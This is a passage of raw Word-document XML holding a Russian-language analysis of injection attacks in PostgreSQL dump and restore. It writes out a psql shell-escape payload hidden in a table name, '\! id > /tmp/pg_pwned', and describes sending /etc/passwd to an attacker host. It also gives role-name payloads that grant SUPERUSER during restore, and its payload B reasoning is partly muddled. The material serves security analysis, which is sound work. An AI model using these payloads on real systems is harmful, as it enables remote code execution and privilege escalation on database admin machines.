        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! id &gt; /tmp/pg_pwned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... (тот же текст в quoted form)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">" (data text);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При psql-restore:</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Первый блок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (комментарий с newline-разрывом): psql видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Name: innocent_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комментарий. Затем newline — конец комментария.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — psql meta-command (см. 3.9.7) — исполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id &gt; /tmp/pg_pwned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на хосте, где запущен psql.</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`\echo`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — psql meta-command — выводит текст. Безобиден; используется как маркер.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — второй call, exfiltration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на attacker-controlled host.</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 Type: TABLE...`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — psql видит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снова, остаток комментария до end-of-line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`CREATE TABLE ...`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — quoted-identifier form, PG обрабатывает корректно; таблица создаётся.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE на host, где запущен psql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обычно это admin-машина DBA или CI-runner. Имя таблицы создалось «как должно», что снижает подозрения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — SQL injection при pg_restore (без psql, без `\!`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_restore -d staging &lt; /tmp/backup.dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (binary format), а не psql,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meta-commands не работают (pg_restore — это бинарный restorer, не client). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через разрыв комментария — работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE "innocent_role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SUPERUSER TO innocent_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump --format=plain</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Name: innocent_role; Type: ROLE; Schema: -; Owner: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ROLE "innocent_role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SUPERUSER TO innocent_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При psql-restore (plain-format всегда через psql):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--\n-- Name: innocent_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комментарий до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(это шапка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без newline-в-имени-проблем).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\n; Type: ROLE; Schema: -; Owner: -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — новый комментарий (начинается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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE "innocent_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — начало CREATE; quoted-identifier открывается на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внутри quoted-identifier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\nGRANT SUPERUSER TO innocent_role;\n--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — quoted-identifier-парсер ждёт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 реагирует на newline или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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Всё это часть имени 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закрывающая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который часть имени).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. PG cоздаёт role с именем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"innocent_role\nGRANT SUPERUSER TO innocent_role;\n--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая newline 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 injection через CREATE; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">имя role на 70+ байт</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Где injection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разорвать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> quoted-identifier раньше. Newline сам по себе не разрывает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нужен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явный. Это требует более сложного payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE "innocent""\nGRANT SUPERUSER TO some_user;--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь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escape для одиночной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имени получается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">innocent"\nGRANT SUPERUSER TO some_user;--</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При сериализации pg_dump:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE "innocent""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SUPERUSER TO some_user;--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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пишет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escape; ломанная форма зависит от реализации dump.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При парсинге restore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escape,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открывает новую quoted-region. Точный сценарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">зависит от bug-class CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и публичный PoC R25 — на GitHub-issue PG; полный детальный walkthrough — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (август 2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводка: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R25 показал, что fix CVE-2012-0868 был частичный</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — некоторые формы Unicode/escape/format-string-comments позволяли injection в restore-context, даже если application-уровневый pg_dump quoted-identifier корректно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — RCE через plpgsql-function body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий создаёт plpgsql-функцию с newline-в-теле, который при сериализации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уходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">за</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dollar-quoted-границу или в SQL-комментарий dump-блока:</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public.innocent_func() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
